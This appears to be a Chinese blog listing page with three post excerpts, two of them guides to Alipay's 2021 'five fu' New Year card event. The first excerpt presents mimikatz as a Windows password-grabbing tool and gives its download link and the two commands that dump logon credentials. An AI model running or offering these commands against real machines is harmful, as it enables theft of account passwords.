一、软件介绍 一款获取windows账号密码的软件 二、下载地址(软件作者) https://github.com/gentilkiwi/mimikatz 或加入Kirin博客交流群下载 三、使用方法 1、解压后双击打开,分32位和64位 2、输入下面两行命令,直接获取密码 privilege::debug sekurlsa::logonpasswords ...
-
支付宝AR扫码高几率中万能福
2021.2.4更新 需要有两个手机或有电脑才能扫! 记得分享给朋友! ——— 支付宝->扫一扫->中间->AR->扫码图片福字 ——— PS:万能福有什么用?直接转换任意福卡,直接转成敬业。有敬业了? 再转换一张送朋友!可以多扫,扫到上限!...
-
支付宝2021年集五福最强攻略
支付宝2021年集五福最强攻略 支付宝集福今天正式开始了,活动时间2月1日到2月11日,瓜分红包时间2月11日晚上22:18,以下是小编手动整理的最简单最直观的方法,每天都可以多次参加,重复扫!每张福卡还可以抽奖,进入支付宝五福页面,点顶部我的福卡,点右下角刮奖抽不同的奖励! 一:AR扫码 打开支付宝->扫一扫->选择AR->扫任意福字->抽取福卡->需要有两台设备的才可以 福卡图片: 二:写福字 支付宝搜索“写福字”->点右边写福字进入->领取手写福卡->可以领取两次 三:蚂蚁森林和芭芭农场 支付宝搜索“蚂蚁森林”->进去后找能量->点福气球->抽取福卡->目前尚未开启->2月4日开启! 手机淘宝搜索“芭芭农场”->进入后施肥抽取福卡->目前尚未开启->2月7日开启! 四:搜索关键字 支付宝首页顶部搜索这些关机键字->就可以看见抽福卡入口:一汽大众、银泰百货、肯德基、麦当劳、星巴克、滴滴、蒙牛、爱琴海、星河、大悦城、砂之船奥莱 五:薇娅送万能福 支付宝AR扫码有几率获得万能福,万能福可兑换五福中的任意一张福 六:扫专属图片 打开支付宝->扫一扫->选择AR->然后对着每张图片放大(第二张图片很大概率会中沾沾福卡)->扫码抽取福卡->需要有两台设备的才可以 七:消费券抽沾沾卡 支付宝搜索“消费券”->点进去后->翻卡片->几率得沾沾福卡 八:找剪纸任务 支付宝扫码进入活动->每个任务依次按照提示操作->都做完后即可抽取->万能福或沾沾福(限部分用户,需要有商家码的才能进去) 九:福气盲盒 支付宝打开下面链接 收入手机号即可领取随机福卡 领取后需要手动激活 到支付宝卡包->去使用->手动领取即可! 1、天猫精灵 https://render.alipay.com/p/c/17yq18lq3slc?source=JING_LING 2、飞猪 https://render.alipay.com/p/c/17yq18lq3slc?source=FEI_ZHU 3、优酷 https://render.alipay.com/p/c/17yq18lq3slc?source=YOUKU_TV 4、淘票票 https://render.alipay.com/p/c/17yq18lq3slc?source=PIAO_PIAO 5、手机天猫 https://render.alipay.com/p/c/17yq18lq3slc?source=TIAN_MAO 6、考拉 https://render.alipay.com/p/c/17yq18lq3slc?source=KAO_LA 7、菜鸟 https://render.alipay.com/p/c/17yq18lq3slc?source=CAI_NIAO 8、新华社 https://render.alipay.com/p/c/17yq18lq3slc?source=XINHUA_SHE 9、江南百景图 https://render.alipay.com/p/c/17yq18lq3slc?source=BAI_JINGTU 10、科创中国 https://render.alipay.com/p/c/17yq18lq3slc?source=KE_CHUANG 11、科技工作者之家 https://render.alipay.com/p/c/17yq18lq3slc?source=KEJI_ZHIJIA 12、上观新闻 https://render.alipay.com/p/c/17yq18lq3slc?source=JIEFANG_RIBAO 13、新安晚报 https://render.alipay.com/p/c/17yq18lq3slc?source=DA_WAN 14、南京紫金山新闻 https://render.alipay.com/p/c/17yq18lq3slc?source=ZIJIN_SHAN 15、中国蓝新闻 https://render.alipay.com/p/c/17yq18lq3slc?source=ZHONGGUO_LAN 16、大河财立方 https://render.alipay.com/p/c/17yq18lq3slc?source=CAI_LIFANG 17、正观APP https://render.alipay.com/p/c/17yq18lq3slc?source=ZHENG_GUAN 18、江西新闻客户端 https://render.alipay.com/p/c/17yq18lq3slc?source=JIANGXI_XINWEN 19、羊城晚报 https://render.alipay.com/p/c/17yq18lq3slc?source=YANG_CHENG 20、N视频 https://render.alipay.com/p/c/17yq18lq3slc?source=NAN_DU 21、三亚日报 https://render.alipay.com/p/c/17yq18lq3slc?source=SANYA_RIBAO 22、开屏新闻 https://render.alipay.com/p/c/17yq18lq3slc?source=CHUNCHENG_WANBAO 23、天眼新闻 https://render.alipay.com/p/c/17yq18lq3slc?source=GUIZHOU_DUSHIBAO 24、黄河plus https://render.alipay.com/p/c/17yq18lq3slc?source=HUANG_HE 25、陕西头条 https://render.alipay.com/p/c/17yq18lq3slc?source=SHANXI_TOUTIAO 26、新京报 https://render.alipay.com/p/c/17yq18lq3slc?source=XINJING_BAO 27、津云客户端 https://render.alipay.com/p/c/17yq18lq3slc?source=JIN_YUN 28、重庆日报 https://render.alipay.com/p/c/17yq18lq3slc?source=CHONG_QING 29、龙头新闻 https://render.alipay.com/p/c/17yq18lq3slc?source=LONGTOU_XINWEN 30、风口财经 https://render.alipay.com/p/c/17yq18lq3slc?source=FENGKOU_CAIJING 31、齐鲁晚报 https://render.alipay.com/p/c/17yq18lq3slc?source=QILU_WANBAO 32、国家政务服务平台 https://render.alipay.com/p/c/17yq18lq3slc?source=GUOWU_YUAN 33、电子社保卡 https://render.alipay.com/p/c/17yq18lq3slc?source=REN_SHE 34、医保局 https://render.alipay.com/p/c/17yq18lq3slc?source=YI_BAO 35、豫事办 https://render.alipay.com/p/c/17yq18lq3slc?source=YUSHI_BAN 36、鄂汇办 https://render.alipay.com/p/c/17yq18lq3slc?source=EHUI_BAN 37、随申办 https://render.alipay.com/p/c/17yq18lq3slc?source=SUISHEN_BAN 38、深圳交警 https://render.alipay.com/p/c/17yq18lq3slc?source=SHENZHEN_JIAOJING 39、赣服通 https://render.alipay.com/p/c/17yq18lq3slc?source=GANFU_TONG 40、安徽税务局 https://render.alipay.com/p/c/17yq18lq3slc?source=ANHUI_SHUIWU 41、无锡公积金 https://render.alipay.com/p/c/17yq18lq3slc?source=WUXI_GONGJIJIN 42、上海公积金 https://render.alipay.com/p/c/17yq18lq3slc?source=SHANGHAI_GONGJIJIN 43、天府通办 https://render.alipay.com/p/c/17yq18lq3slc?source=TIANFU_TONG 44、青岛大数据局 https://render.alipay.com/p/c/17yq18lq3slc?source=QINGDAN_DASHUJU 45、皖事通 https://render.alipay.com/p/c/17yq18lq3slc?source=WANSHI_TONG 46、闽政通 https://render.alipay.com/p/c/17yq18lq3slc?source=MINZHENG_TONG 47、美图秀秀 https://render.alipay.com/p/c/17yq18lq3slc?source=MEI_TU 48、美颜相机 https://render.alipay.com/p/c/17yq18lq3slc?source=MEI_YAN 49、芒果TV https://render.alipay.com/p/c/17yq18lq3slc?source=MANG_GUO 50、快手 https://render.alipay.com/p/c/17yq18lq3slc?source=KUAI_SHOU 51、网易云音乐 https://render.alipay.com/p/c/17yq18lq3slc?source=WANGYI_YUN 52、书旗小说 https://render.alipay.com/p/c/17yq18lq3slc?source=SHU_QI 虽然瓜分不了多少,但是每年的集福咱们就图个热闹,重在参与,集完福年味就越来越近了,大家开开心心最重要! ...